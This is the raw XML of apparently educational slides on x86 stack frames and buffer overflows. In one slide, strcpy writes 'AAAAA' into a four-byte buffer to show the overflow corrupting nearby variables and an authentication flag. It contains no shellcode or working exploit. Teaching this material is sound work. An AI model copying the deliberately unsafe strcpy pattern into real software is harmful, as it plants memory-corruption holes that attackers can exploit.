              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>into the function's code.</a:t>
            </a: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66" name="Shape 266"/>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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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l"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lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>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*buf (function's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rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Shape 267"/>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68" name="Shape 268"/>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69" name="Shape 269"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="2758900" x="1808249"/>
            <a:ext cy="141600" cx="1470600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Shape 270"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2523100" x="3278850"/>
            <a:ext cy="377399" cx="2319300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$EIP will point here (roughly)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Shape 271"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3275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72" name="Shape 272"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="271" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3428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78" name="Shape 27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var 1 will get pushed onto the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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79" name="Shape 279"/>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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>var1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>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*buf (function's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rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Shape 280"/>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81" name="Shape 281"/>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82" name="Shape 282"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2884725" x="1603675"/>
            <a:ext cy="330300" cx="4011000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Shape 283"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2894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84" name="Shape 284"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="283" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3047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290" name="Shape 29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buf2 will get pushed onto the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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291" name="Shape 291"/>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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>buf2</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var1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a: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t>return address (ret)</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*buf (function's argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a: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SzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Shape 292"/>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293" name="Shape 293"/>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294" name="Shape 294"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="2853250" x="1603675"/>
            <a:ext cy="251699" cx="4160400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Shape 295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2513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296" name="Shape 296"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="295" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="2666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x86 Stack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Shape 30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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now lets see how data gets written onto the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with a strcpy(buf2, buf), where buf2 ="AAAAA"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>int function(char *buf){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  char buf2[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  // some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  if(function(argv[1]) )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>	  // do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Shape 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1757700" x="59419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lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>AAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>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*buf (function's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rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Shape 304"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="62955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305" name="Shape 305"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1571150" x="4754739"/>
            <a:ext cy="354000" cx="1448099"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="306" name="Shape 306"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="2853224" x="1674450"/>
            <a:ext cy="613500" cx="4089599"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="307" name="Shape 307"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2735300" x="7352750"/>
            <a:ext cy="660600" cx="15600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Shape 308"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2735300" x="7948979"/>
            <a:ext cy="739199" cx="1078499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>writes towards high memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Shape 309"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3631875" x="3294575"/>
            <a:ext cy="840000" cx="2562900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>overflow!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Shape 310"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2513000" x="8205050"/>
            <a:ext cy="307499" cx="882899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="311" name="Shape 311"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="310" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="2666749" x="7992350"/>
            <a:ext cy="3900" cx="212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9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">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ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1550388" x="216375"/>
            <a:ext cy="4840199" cx="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Program scratch space ----</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-------&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>local (scoped) variables, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>environment variables,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>passed arguments,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>return instruction pointers</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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>dynamic space             ------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-----&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	malloc(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
